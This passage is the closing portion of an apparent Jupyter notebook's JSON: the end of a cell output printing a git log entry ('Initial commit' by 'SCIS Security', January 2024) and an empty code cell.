326 | "\u001b[33mcommit 2963aea0acbcb8edecb631679f37a93774104242\u001b[m\n",
327 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
328 | "Date: Sat Jan 20 23:46:29 2024 -0600\n",
329 | "\n",
330 | " Initial commit\n"
331 | ]
332 | }
333 | ]
334 | },
335 | {
336 | "cell_type": "code",
337 | "source": [],
338 | "metadata": {
339 | "id": "bNt1x5olzhja"
340 | },
341 | "execution_count": null,
342 | "outputs": []
343 | }
344 | ]
345 | }
--------------------------------------------------------------------------------